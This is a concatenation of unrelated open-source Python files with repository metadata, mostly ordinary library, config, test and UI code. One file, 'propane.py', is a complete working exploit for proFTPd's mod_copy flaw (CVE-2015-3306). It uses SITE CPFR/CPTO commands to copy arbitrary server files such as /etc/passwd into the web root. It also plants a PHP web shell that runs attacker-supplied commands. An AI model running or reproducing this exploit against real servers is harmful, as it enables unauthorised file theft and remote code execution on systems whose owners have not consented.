self._logger.removeHandler(self._logging_file_handler)
if file == self._DEFAULT_LOG_FILE:
self._logging_file_handler = logging.StreamHandler()
else:
self._logging_file_handler = (
logging.handlers.RotatingFileHandler(
filename=file, maxBytes=5000000, backupCount=10))
log_format = logging.Formatter(
'%(asctime)s [%(name)s]: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
self._logging_file_handler.setFormatter(log_format)
self._logger.addHandler(self._logging_file_handler)
super(SandeshLogger, self).set_logging_file(file)
# end set_logging_file
def set_logging_syslog(self, enable_syslog, syslog_facility):
if (self.is_syslog_logging_enabled() == enable_syslog and
self.logging_syslog_facility() == syslog_facility):
return
if self.logging_syslog_facility() != syslog_facility:
self._logger.info('SANDESH: Logging: SYSLOG: [%s] -> [%s]',
self.logging_syslog_facility(), syslog_facility)
if self.is_syslog_logging_enabled():
self._logger.removeHandler(self._logging_syslog_handler)
if enable_syslog:
self._logging_syslog_handler = logging.handlers.SysLogHandler(
address="/dev/log",
facility=getattr(logging.handlers.SysLogHandler,
syslog_facility,
|
logging.handlers.SysLogHandler.LOG
|
_LOCAL0)
)
self._logger.addHandler(self._logging_syslog_handler)
super(SandeshLogger, self).set_logging_syslog(enable_syslog,
syslog_facility)
# end set_logging_syslog
# end class SandeshLogger
|
andrelaszlo/qtile
|
examples/config/tailhook-config.py
|
Python
|
mit
| 6,113
| 0.003278
|
# -*- coding: utf-8 -*-
from libqtile.manager import Key, Click, Drag, Screen, Group
from libqtile.command import lazy
from libqtile import layout, bar, widget, hook
from libqtile import xcbq
xcbq.keysyms["XF86AudioRaiseVolume"] = 0x1008ff13
xcbq.keysyms["XF86AudioLowerVolume"] = 0x1008ff11
xcbq.keysyms["XF86AudioMute"] = 0x1008ff12
def window_sorter(win):
patterns = (
('Яндекс.Почта', 'E-mail'),
('Gmail', 'E-mail'),
('SquirrelMail', 'E-mail'),
('zeromq', 'Docs'),
('PyYAML', 'Docs'),
('documentation', 'Docs'),
('-ietf-', 'Docs'),
('GNOME Live!', 'Docs'),
('Guide', 'Docs'),
)
for k, v in patterns:
if k in win.name:
return v
mod = "mod4"
keys = [
Key([mod], "j",
lazy.layout.down()),
Key([mod], "k",
lazy.layout.up()),
Key([mod, "shift"], "j",
lazy.layout.move_down()),
Key([mod, "shift"], "k",
lazy.layout.move_up()),
Key([mod, "control"], "j",
lazy.layout.section_down()),
Key([mod, "control"], "k",
lazy.layout.section_up()),
Key([mod], "h",
lazy.layout.collapse_branch()), # for tree layout
Key([mod], "l",
lazy.layout.expand_branch()), # for tree layout
Key([mod], "r",
lazy.layout.sort_windows(window_sorter)), # for tree layout
Key([mod, "shift"], "h",
lazy.layout.move_left()),
Key([mod, "shift"], "l",
lazy.layout.move_right()),
Key([mod, "control"], "l",
lazy.layout.increase_ratio()),
Key([mod, "control"], "h",
lazy.layout.decrease_ratio()),
Key([mod], "comma",
lazy.layout.increase_nmaster()),
Key([mod], "period",
lazy.layout.decrease_nmaster()),
Key([mod], "Tab",
lazy.group.next_window()),
Key([mod, "shift"], "Tab",
lazy.group.prev_window()),
Key([mod, "shift"], "Return",
lazy.layout.rotate()),
Key([mod, "shift"], "space",
lazy.layout.toggle_split()),
Key([mod], "w",
lazy.to_screen(0)),
Key([mod], "e",
lazy.to_screen(1)),
Key([mod], "space",
lazy.nextlayout()),
Key([mod], "c",
lazy.window.kill()),
Key([mod], "t",
lazy.window.disable_floating()),
Key([mod, "shift"], "t",
lazy.window.enable_floating()),
Key([mod], "p",
lazy.spawn("exec dmenu_run "
"-fn 'Consolas:size=13' -nb '#000000' -nf '#ffffff' -b")),
Key([mod], "b",
lazy.spawn("~/note/conf/uzbl/open_history")),
Key([mod, "shift"], "b",
lazy.spawn("~/note/conf/uzbl/open_bookmark")),
Key([mod], "s",
lazy.spawn("~/note/conf/uzbl/open_ddg")),
Key([mod, "shift"], "s",
lazy.spawn("~/note/conf/uzbl/open_goog")),
Key([mod], "q",
lazy.spawn('xtrlock')),
Key([mod], "y",
lazy.spawn('xclip -o -selection primary | xclip -selection clipboard')),
Key([mod], "u",
lazy.spawn('xclip -o -selection clipboard | xclip -selection primary')),
Key([], "XF86AudioRaiseVolume",
lazy.spawn("amixer sset Master 5%+")),
Key([], "XF86AudioLowerVolume",
lazy.spawn("amixer sset Master 5%-")),
Key([], "XF86AudioMute",
lazy.spawn("amixer sset Master toggle")),
Key(["shift"], "XF86AudioRaiseVolume",
lazy.spawn("mpc volume +5")),
Key(["shift"], "XF86AudioLowerVolume",
lazy.spawn("mpc volume -5")),
Key(["shift"], "XF86AudioMute",
lazy.spawn("mpc toggle")),
Key([mod], "Left",
lazy.prevgroup()),
Key([mod], "Right",
lazy.nextgroup()),
]
mouse = [
Drag([mod], "Button1", lazy.window.set_position_floating(),
start=lazy.window.get_position()),
Drag([mod], "Button3", lazy.window.set_size_floating(),
start=lazy.window.get_size()),
Click([mod], "Button2", lazy.window.bring_to_front())
]
border = dict(
border_normal='#808080',
border_width=2,
)
layouts = [
layout.Tile(**border),
layout.Max(),
layout.Stack(**border),
layout.TreeTab(sections=['Surfing', 'E-mail', 'Docs', 'Incognito']),
layout.Slice('left', 320, wmclass='pino',
fallback=layout.Slice('right', 320, role='roster',
fallback=layout.Stack(
|
1, **border))),
layout.Slice('left', 192, role='gimp-toolbox',
fallback=layout.Slice('right', 256, role='gimp-dock',
fallback=layout.Stack(1, **border))),
]
floating_layout = layout.Floating(**border)
groups = [
Group('1'),
Gr
|
oup('2', layout='max'),
Group('3'),
Group('4', layout='treetab'),
Group('5'),
Group('6'),
Group('7'),
Group('8'),
Group('9'),
]
for i in groups:
keys.append(
Key([mod], i.name, lazy.group[i.name].toscreen())
)
keys.append(
Key([mod, "shift"], i.name, lazy.window.togroup(i.name))
)
screens = [
Screen(
top = bar.Bar(
[
widget.GroupBox(borderwidth=2,
font='Consolas',fontsize=18,
padding=1, margin_x=1, margin_y=1),
widget.Sep(),
widget.WindowName(
font='Consolas',fontsize=18, margin_x=6),
widget.Sep(),
widget.Battery(
font='Consolas',fontsize=18, margin_x=6),
widget.Sep(),
widget.CPUGraph(),
widget.MemoryGraph(),
widget.SwapGraph(foreground='C02020'),
widget.Sep(),
widget.Systray(),
widget.Sep(),
widget.Clock('%H:%M:%S %d.%m.%Y',
font='Consolas', fontsize=18, padding=6),
],
24,
),
),
]
@hook.subscribe.client_new
def dialogs(window):
if(window.window.get_wm_type() == 'dialog'
or window.window.get_wm_transient_for()):
window.floating = True
|
Mickey32111/pogom
|
pogom/pgoapi/protos/POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage_pb2.py
|
Python
|
mit
| 2,108
| 0.010436
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nNPOGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"\"\n CollectDailyDefenderBonusMessageb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_COLLECTDAILYDEFENDERBONUSMESSAGE = _descriptor.Descriptor(
name='CollectDailyDefenderBonusMessage',
full_name='POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
field
|
s=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ra
|
nges=[],
oneofs=[
],
serialized_start=123,
serialized_end=157,
)
DESCRIPTOR.message_types_by_name['CollectDailyDefenderBonusMessage'] = _COLLECTDAILYDEFENDERBONUSMESSAGE
CollectDailyDefenderBonusMessage = _reflection.GeneratedProtocolMessageType('CollectDailyDefenderBonusMessage', (_message.Message,), dict(
DESCRIPTOR = _COLLECTDAILYDEFENDERBONUSMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage)
))
_sym_db.RegisterMessage(CollectDailyDefenderBonusMessage)
# @@protoc_insertion_point(module_scope)
|
mr-ping/tornado
|
tornado/test/httpserver_test.py
|
Python
|
apache-2.0
| 41,934
| 0.000501
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado import netutil
from tornado.escape import json_decode, json_encode, utf8, _unicode, recursive_unicode, native_str
from tornado import gen
from tornado.http1connection import HTTP1Connection
from tornado.httpserver import HTTPServer
from tornado.httputil import HTTPHeaders, HTTPMessageDelegate, HTTPServerConnectionDelegate, ResponseStartLine
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado.netutil import ssl_options_to_context
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado.testing import AsyncHTTPTestCase, AsyncHTTPSTestCase, AsyncTestCase, ExpectLog, gen_test
from tornado.test.util import unittest, skipOnTravis
from tornado.web import Application, RequestHandler, asynchronous, stream_request_body
from contextlib import closing
import datetime
import gzip
import os
import shutil
import socket
import ssl
import sys
import tempfile
from io import BytesIO
def read_stream_body(stream, callback):
"""Reads an HTTP response from `stream` and runs callback with its
headers and body."""
chunks = []
class Delegate(HTTPMessageDelegate):
def headers_received(self, start_line, headers):
self.headers = headers
def data_received(self, chunk):
chunks.append(chunk)
def finish(self):
callback((self.headers, b''.join(chunks)))
conn = HTTP1Connection(stream, True)
conn.read_response(Delegate())
class HandlerBaseTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([('/', self.__class__.Handler)])
def fetch_json(self, *args, **kwargs):
response = self.fetch(*args, **kwargs)
response.rethrow()
return json_decode(response.body)
class HelloWorldRequestHandler(RequestHandler):
def initialize(self, protocol="http"):
self.expected_protocol = protocol
def get(self):
if self.request.protocol != self.expected_protocol:
raise Exception("unexpected protocol")
self.finish("Hello world")
def post(self):
self.finish("Got %d bytes in POST" % len(self.request.body))
# In pre-1.0 versions of openssl, SSLv23 clients always send SSLv2
# ClientHello messages, which are rejected by SSLv3 and TLSv1
# servers. Note that while the OPENSSL_VERSION_INFO was formally
# introduced in python3.2, it was present but undocumented in
# python 2.7
skipIfOldSSL = unittest.skipIf(
getattr(ssl, 'OPENSSL_VERSION_INFO', (0, 0)) < (1, 0),
"old version of ssl module and/or openssl")
class BaseSSLTest(AsyncHTTPSTestCase):
def get_app(self):
return Application([('/', HelloWorldRequestHandler,
dict(protocol="https"))])
class SSLTestMixin(object):
def get_ssl_options(self):
return dict(ssl_version=self.get_ssl_version(), # type: ignore
**AsyncHTTPSTestCase.get_ssl_options())
def get_ssl_version(self):
raise NotImplementedError()
def test_ssl(self):
response = self.fetch('/')
self.assertEqual(response.body, b"Hello world")
def test_large_post(self):
response = self.fetch('/',
method='POST',
body='A' * 5000)
self.assertEqual(response.body, b"Got 5000 bytes in POST")
def test_non_ssl_request(self):
# Make sure the server closes the connection when it gets a non-ssl
# connection, rather than waiting for a timeout or otherwise
# misbehaving.
with ExpectLog(gen_log, '(SSL Error|uncaught
|
exception)'):
with ExpectLog(gen_log, 'Uncaught exception', required=False):
self.http_client.fetch(
self.get_url("/").replace('https:', 'http:'),
self.stop,
request_timeo
|
ut=3600,
connect_timeout=3600)
response = self.wait()
self.assertEqual(response.code, 599)
def test_error_logging(self):
# No stack traces are logged for SSL errors.
with ExpectLog(gen_log, 'SSL Error') as expect_log:
self.http_client.fetch(
self.get_url("/").replace("https:", "http:"),
self.stop)
response = self.wait()
self.assertEqual(response.code, 599)
self.assertFalse(expect_log.logged_stack)
# Python's SSL implementation differs significantly between versions.
# For example, SSLv3 and TLSv1 throw an exception if you try to read
# from the socket before the handshake is complete, but the default
# of SSLv23 allows it.
class SSLv23Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_SSLv23
@skipIfOldSSL
class SSLv3Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_SSLv3
@skipIfOldSSL
class TLSv1Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_TLSv1
@unittest.skipIf(not hasattr(ssl, 'SSLContext'), 'ssl.SSLContext not present')
class SSLContextTest(BaseSSLTest, SSLTestMixin):
def get_ssl_options(self):
context = ssl_options_to_context(
AsyncHTTPSTestCase.get_ssl_options(self))
assert isinstance(context, ssl.SSLContext)
return context
class BadSSLOptionsTest(unittest.TestCase):
def test_missing_arguments(self):
application = Application()
self.assertRaises(KeyError, HTTPServer, application, ssl_options={
"keyfile": "/__missing__.crt",
})
def test_missing_key(self):
"""A missing SSL key should cause an immediate exception."""
application = Application()
module_dir = os.path.dirname(__file__)
existing_certificate = os.path.join(module_dir, 'test.crt')
existing_key = os.path.join(module_dir, 'test.key')
self.assertRaises((ValueError, IOError),
HTTPServer, application, ssl_options={
"certfile": "/__mising__.crt",
})
self.assertRaises((ValueError, IOError),
HTTPServer, application, ssl_options={
"certfile": existing_certificate,
"keyfile": "/__missing__.key"
})
# This actually works because both files exist
HTTPServer(application, ssl_options={
"certfile": existing_certificate,
"keyfile": existing_key,
})
class MultipartTestHandler(RequestHandler):
def post(self):
self.finish({"header": self.request.headers["X-Header-Encoding-Test"],
"argument": self.get_argument("argument"),
"filename": self.request.files["files"][0].filename,
"filebody": _unicode(self.request.files["files"][0]["body"]),
})
# This test is also called from wsgi_test
class HTTPConnectionTest(AsyncHTTPTestCase):
def get_handlers(self):
return [("/multipart", MultipartTestHandler),
("/hello", HelloWorldRequestHandler)]
def get_app(self):
return Application(self.get_handlers())
def raw_fetch(self, headers, body, newline=b"\r\n"):
with closing(IOStream(socket.socket())) as stream:
stream.connect(('127.0.0.1', self.get_http_port()), self.stop)
self.wait()
stream.write(
newline.join(headers +
[utf8("Content-Length: %d" % len(body))]) +
newline + newline + body)
read_stream_body(stream, self.stop)
headers, body = self.wait()
return body
def test_multipart_form(self):
# Encodings here are tricky: Headers are latin1, bodies can be
# anything (we use utf8 by default).
response = self.raw_fetch([
b"POST /multipart HTTP/1.0",
b"Content-Type: multipart/form-data; boundary=1234567890",
b"X-Header-encoding-test: \xe9"
|
klausweiss/python-aui
|
aui/widgets.py
|
Python
|
bsd-2-clause
| 4,207
| 0.000475
|
import sys
# widgets
class Button:
"""
Represents button
Keyword arguments:
text -- button text
| str
onclick -- function invoked after pressing the button
| function: Button -> void
Attributes:
wide -- makes the button wide
"""
def __new__(cls, text=None, onclick=None):
return object.__new__(sys.modules['aui.widgets'].Button)
def __init__(self, text, onclick=None):
self.wide = self
def destroy(self):
"""Destroys the button"""
pass
class Checkbox:
"""
Represents checkbox in UI
Keyword arguments:
text -- checkbox text
| str
selected -- whether the checkbox is selected on init
| boolean
onchange -- function invoked after toggling the checkbox
| function: Checkbox -> void
"""
def __new__(cls, text=None, selected=False, onchange=None, *args):
return object.__new__(sys.modules['aui.widgets'].Checkbox)
def __init__(self, text, selected=False, onchange=None):
pass
def destroy(self):
"""Destroys the checkbox"""
pass
class Input:
"""
Represents input field in UI
Keyword arguments:
value
|
-- default value
| str (default: "")
onenter -- function called after the return key is pressed
| function: Input -> void
Attributes:
wide -- makes the input wide
"""
def __new__(cls, value="", onenter=None, *args):
return object.__new__(sys.modules['aui.widgets'].Input)
def __init__(self, value="", onenter=None):
self.wide = self
def destroy(self):
"""Destroys the input
|
field"""
pass
class Label:
"""
Represents label in UI
Keyword arguments:
text -- label text
| str
"""
def __new__(cls, text=None, *args):
return object.__new__(sys.modules['aui.widgets'].Label)
def __init__(self, text):
pass
def destroy(self):
"""Destroys the label"""
pass
class Text:
"""
Represents multiline input field in UI
Keyword arguments:
text -- widget text
| str (default: "")
"""
def __new__(cls, text=None, *args):
return object.__new__(sys.modules['aui.widgets'].Text)
def __init__(self, text=""):
pass
def destroy(self):
"""Destroys the text field"""
pass
# containers
class Vertical:
"""
Represents vertical container in UI
Arguments:
*children -- children elements of the container
"""
def __new__(cls, *args):
return object.__new__(sys.modules['aui.widgets'].Vertical)
def append(self, child):
"""
Appends widget to the vertical container
Keyword arguments:
child -- the widget to be placed into the container
"""
pass
def create(self, parent, align=None):
"""
Creates vertical container and assigns it to its parent
Keyword arguments:
parent -- parent of the element to be put into
align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT)
"""
pass
def destroy(self):
"""Destroys the vertical container"""
pass
class Horizontal:
"""
Represents horizontal container in UI
Arguments:
*children -- children elements of the container
"""
def __new__(cls, *args):
return object.__new__(sys.modules['aui.widgets'].Horizontal)
def append(self, child):
"""
Appends widget to the horizontal container
Keyword arguments:
child -- the widget to be placed into the container
"""
pass
def create(self, parent, align=None):
"""
Creates horizontal container and assigns it to its parent
Keyword arguments:
parent -- parent of the element to be put into
align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT)
"""
pass
def destroy(self):
"""Destroys the horizontal container"""
pass
|
linuxdeepin/deepin-ui
|
dtk/ui/cycle_strip.py
|
Python
|
gpl-3.0
| 2,087
| 0.001917
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2012 Deepin, Inc.
# 2011 ~ 2012 Wang Yong
#
# Author: Wang Yong <lazycat.manatee@gmail.com>
# Maintainer: Wang Yong <lazycat.manatee@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import gobject
from cache_pixbuf import CachePixbuf
from draw import draw_pixbuf
class CycleStrip(gtk.HBox):
'''
CycleStrip class.
This widget use for cycle drawing background, but use CachePixbuf to accelerate render.
@undocumented: expose_cycle_strip
'''
def __init__(self, background_dpixbuf):
'''
Initialize CycleStrip class.
@param background_
|
dpixbuf: DynamicPixbuf background.
'''
gtk.HBox.__init__(self)
self.background_dpixbuf = background_dpixbuf
self.cache_pixbuf = CachePixbuf()
self.set_size_request(-1, self.background_dpixbuf.get_pixbuf().get_height())
self.connect("expose-event", self.expose_cycle_strip)
def expose_cycle_strip(self, widget, event):
# Init.
cr = widget.window.
|
cairo_create()
rect = widget.allocation
background_pixbuf = self.background_dpixbuf.get_pixbuf()
self.cache_pixbuf.scale(
background_pixbuf,
rect.width,
rect.height)
draw_pixbuf(
cr,
self.cache_pixbuf.get_cache(),
rect.x,
rect.y)
return False
gobject.type_register(CycleStrip)
|
mfogel/django-signup-login
|
signup_login/urls.py
|
Python
|
bsd-3-clause
| 1,287
| 0.006993
|
from django.conf.urls.defaults import *
from .views import *
urlpatterns = patterns('',
url(r'^signup/$',
view=SignupLoginView.as_view(
featured_form_mixin_class=SignupMultipleFormMixin),
name='accounts_signup'
),
url(r'^login/$',
view=SignupLoginView.as_view(
featured_form_mixin_class=LoginMultipleFormMixin),
name='accounts_login'
),
url(r'^signup-login/$',
view=SignupLoginView.as_view(),
name='accounts_signup_login'
),
url(r'^iframes/signup/$',
view=SignupLoginIframeView.as_v
|
iew(
featured_form_mixin_class=SignupIframeMultipleFormMixin),
name='accounts_signup_iframe'
|
),
url(r'^iframes/login/$',
view=SignupLoginIframeView.as_view(
featured_form_mixin_class=LoginIframeMultipleFormMixin),
name='accounts_login_iframe'
),
url(r'^iframes/signup-login/$',
view=SignupLoginIframeView.as_view(),
name='accounts_signup_login_iframe'
),
url(r'^iframes/signup-login/success/$',
view=SignupLoginSuccessIframeView.as_view(),
name='accounts_signup_login_success_iframe'
),
url(r'^logout/$',
view=LogoutView.as_view(),
name='accounts_logout'
),
)
|
ERPXE/erpxe
|
erpxe/cli.py
|
Python
|
gpl-3.0
| 2,519
| 0.030171
|
# import the ERPXE core API
import core
# Global variables
TFTPBOOT_DIR = "/tftpboot"
PLUGINS_DIR = TFTPBOOT_DIR + "/er/plugins"
# try to Load configuration from file system or use defaults
def load_configuration():
# try to fetch configuration from file
try:
config = core.get_configuration()
except:
print "error loading "
load_configuration()
# parse CLI arguments
def cli(arguments):
verbose = arguments['--verbose']
if arguments['list']:
show_plugins()
elif arguments['status']:
print_status()
elif arguments['render']:
generate_menu()
elif arguments['enable']:
plugin = arguments['<plugin>']
enable(plugin)
elif arguments['disable']:
plugin = arguments['<plugin>']
disable(plugin)
def print_status():
import os.path
# print some pre-status header
print "ERPXE v2.0"
# test folders
print "TFTPBOOT path: " + TFTPBOOT_DIR
if os.path.isdir(TFTPBOOT_DIR):
print "directory found."
print "Plugins path: " + PLUGINS_DIR
if os.path.isdir(PLUGINS_DIR):
print "directory found."
def show_plugins():
plugins = core.get_plugins_list(PLUGINS_DIR)
if plugins:
print "Installed plugins:"
for plugin in plugins:
if plugin['deactivated']:
print plugin['name'] + " (disabled) "
else:
print plugin['name']
# Generate Menu files inside the TFTPBOOT folder.
def generat
|
e_menu():
try:
core.get_configuration()
print("ERPXE menu rendered succesfully")
exc
|
ept Exception, e:
print str(e)
print "missing configuration file. use 'erpxe create-configuration-file' command to create one from template"
return
core.generate_menu(TFTPBOOT_DIR, PLUGINS_DIR)
def similar(PLUGIN):
from difflib import SequenceMatcher
plugins = core.get_plugins_list(PLUGINS_DIR)
bestName = ''
bestScore = 0
for plugin in plugins:
score = SequenceMatcher(None, PLUGIN.lower(), plugin['name'].lower()).ratio()
if score > bestScore and score > .5:
bestScore = score
bestName = plugin['name']
if bestScore > 0:
print "maybe you meant: " + bestName + " ?"
# Enable plugin
def enable(PLUGIN):
if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN):
print "plugin not exist"
return similar (PLUGIN)
core.enable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN)
# Disable plugin
def disable(PLUGIN):
if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN):
print "plugin not exist"
return similar (PLUGIN)
core.disable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN)
print "Plugin disabled"
|
mitodl/django-server-status
|
server_status/tests/urls.py
|
Python
|
agpl-3.0
| 328
| 0
|
"""URLs to run the tests."""
try:
from django.urls import include
except ImportError:
from django.c
|
onf.urls import include
from django.conf.urls import url
from django.contrib import admin
admin.autodiscover()
urlpatterns = (
url(r'^admin/', admin.site.urls),
|
url(r'^status', include('server_status.urls')),
)
|
r41d/pytradfri
|
pytradfri/mood.py
|
Python
|
mit
| 383
| 0
|
"""Represent a mood on the gateway."
|
""
from .const import ROOT_MOODS
from .resource import ApiResource
class Mood(ApiResource):
def __init__(self, raw, parent):
super().__init__(raw)
self._parent = parent
@property
def path(self):
r
|
eturn [ROOT_MOODS, self._parent, self.id]
def __repr__(self):
return '<Mood {}>'.format(self.name)
|
juliatem/aiohttp
|
aiohttp/abc.py
|
Python
|
apache-2.0
| 3,396
| 0
|
import asyncio
import sys
from abc import ABC, abstractmethod
from collections.abc import Iterable, Sized
PY_35 = sys.version_info >= (3, 5)
class AbstractRouter(ABC):
def _
|
_init__(self):
self._frozen = False
def post_init(s
|
elf, app):
"""Post init stage.
Not an abstract method for sake of backward compatibility,
but if the router wants to be aware of the application
it can override this.
"""
@property
def frozen(self):
return self._frozen
def freeze(self):
"""Freeze router."""
self._frozen = True
@asyncio.coroutine # pragma: no branch
@abstractmethod
def resolve(self, request):
"""Return MATCH_INFO for given request"""
class AbstractMatchInfo(ABC):
@asyncio.coroutine # pragma: no branch
@abstractmethod
def handler(self, request):
"""Execute matched request handler"""
@asyncio.coroutine # pragma: no branch
@abstractmethod
def expect_handler(self, request):
"""Expect handler for 100-continue processing"""
@property # pragma: no branch
@abstractmethod
def http_exception(self):
"""HTTPException instance raised on router's resolving, or None"""
@abstractmethod # pragma: no branch
def get_info(self):
"""Return a dict with additional info useful for introspection"""
@property # pragma: no branch
@abstractmethod
def apps(self):
"""Stack of nested applications.
Top level application is left-most element.
"""
@abstractmethod
def add_app(self, app):
"""Add application to the nested apps stack."""
@abstractmethod
def freeze(self):
"""Freeze the match info.
The method is called after route resolution.
After the call .add_app() is forbidden.
"""
class AbstractView(ABC):
def __init__(self, request):
self._request = request
@property
def request(self):
return self._request
@asyncio.coroutine # pragma: no branch
@abstractmethod
def __iter__(self):
while False: # pragma: no cover
yield None
if PY_35: # pragma: no branch
@abstractmethod
def __await__(self):
return # pragma: no cover
class AbstractResolver(ABC):
@asyncio.coroutine # pragma: no branch
@abstractmethod
def resolve(self, hostname):
"""Return IP address for given hostname"""
@asyncio.coroutine # pragma: no branch
@abstractmethod
def close(self):
"""Release resolver"""
class AbstractCookieJar(Sized, Iterable):
def __init__(self, *, loop=None):
self._loop = loop or asyncio.get_event_loop()
@abstractmethod
def clear(self):
"""Clear all cookies."""
@abstractmethod
def update_cookies(self, cookies, response_url=None):
"""Update cookies."""
@abstractmethod
def filter_cookies(self, request_url):
"""Return the jar's cookies filtered by their attributes."""
class AbstractPayloadWriter(ABC):
@abstractmethod
def write(self, chunk):
"""Write chunk into stream"""
@asyncio.coroutine
@abstractmethod
def write_eof(self, chunk=b''):
"""Write last chunk"""
@asyncio.coroutine
@abstractmethod
def drain(self):
"""Flush the write buffer."""
|
VRaviTheja/SDN-policy
|
testing/testing_portrange.py
|
Python
|
apache-2.0
| 112
| 0
|
from port_range import PortRange
pr
|
= PortRange('1027/15')
print(pr.bounds)
pr = Po
|
rtRange('4242-42')
print(pr)
|
nootropics/propane
|
propane.py
|
Python
|
mit
| 3,698
| 0.027853
|
#!/usr/bin/env python
import sys
import optparse
import socket
import random
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if sys.platform == 'win32':
HEADER = ''
OKBLUE = ''
OKGREEN = ''
WARNING = ''
FAIL = ''
ENDC = ''
BOLD = ''
UNDERLINE = ''
def caution( msg ): print bcolors.BOLD + bcolors.WARNING + "[" + bcolors.ENDC + "!" + bcolors.WARNING + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def good( msg ): print bcolors.BOLD + bcolors.OKGREEN + "[" + bcolors.ENDC + "+" + bcolors.OKGREEN + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def status( msg ): print bcolors.BOLD + bcolors.OKBLUE + "[" + bcolors.ENDC + "*" + bcolors.OKBLUE + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def error( msg ): print bcolors.BOLD + bcolors.FAIL + "[" + bcolors.ENDC + "-" + bcolors.FAIL + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def banner():
title = "proFTPd Arbitrary File Read Write w/ Possible Code Execution (CVE-2015-3306)"
author = "Author: nootropics (root@ropcha.in)"
ch=' '
length=80
spaced_title = ' %s ' % title
spaced_author = ' %s ' % author
print "\n" + bcolors.WARNING + spaced_title.center(length, ch)
print spaced_author.center(length, ch) + "\n\n" + bcolors.ENDC
def clear():
if os.name == 'nt' or sys.platform.startswith('win'): os.system('cls')
else: os.system('clear')
def main():
parser = optparse.OptionParser(banner(), version="%prog")
parser.add_option("-t", "--target", dest="target", default="localhost", type="string", help="Target IP")
parser.add_option("-p", "--port", dest="port", default=21, type="int", help="Target Port")
parser.add_option("-f", "--file", dest="file", default="/etc/passwd", type="string", help="File to grab")
parser.add_option("-m", "--mode", dest="chosenmode", default="1", type="string", help="Option to use 1: Test, 2: Grab File, 3: Code Exec")
parser.add_option("-w", "--webdir", dest="webdir", default="/var/www/", type="string", help="Directory where the webserver gets files from (/var/www/)")
(options, args) = parser.parse_args()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( options.target, options.port ))
except Exception:
quit(error("Cannot connect to %s:%s" % (options.target, options.port)))
status("Connected to %s:%s" % (options.target, options.port))
if options.chosenmode == "1":
s.send("site cpfr /etc/passwd\n")
if "350" in s.recv(1024):
good("Target is vulnerable!")
else:
error("Target doesn't appear to be vulnerable!")
if options.chosenmode == "2":
resultpath = options.webdir + ''.join(random.choice('0123456789ABCDEF') for i in range(16))
s.send("site cpfr %s" % options.file)
if "350" in s.recv(1024):
good("File exists! Copying now")
else:
error("File cannot be
|
found or accessed")
s.send("site cpto %s" % resultpath)
if "250" in s.recv(1024):
good("Copy sucessful! Check http://%s/%s for your file!" % (options.target, resultpath))
else:
error("Access denied!")
if options
|
.chosenmode == "3":
shellkey = ''.join(random.choice('0123456789ABCDEF') for i in range(16)) + ".php"
s.send("site cpfr /etc/passwd")
s.recv(1024)
s.send("site cpto <?php @$_GET['x']($_GET['a']); ?>")
s.recv(1024)
s.send("site cpfr /proc/self/fd/3")
s.recv(1024)
s.send("site cpto %s%s" % (options.webdir, shellkey))
s.recv(1024)
status("Browse to http://%s/%s to activate your payload!" % (options.target, shellkey))
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
sys.exit(error("Closing!"))
|
stuart-knock/tvb-framework
|
tvb/core/code_versions/code_update_scripts/4750_update_code.py
|
Python
|
gpl-2.0
| 2,378
| 0.006728
|
# -*- coding: utf-8 -*-
#
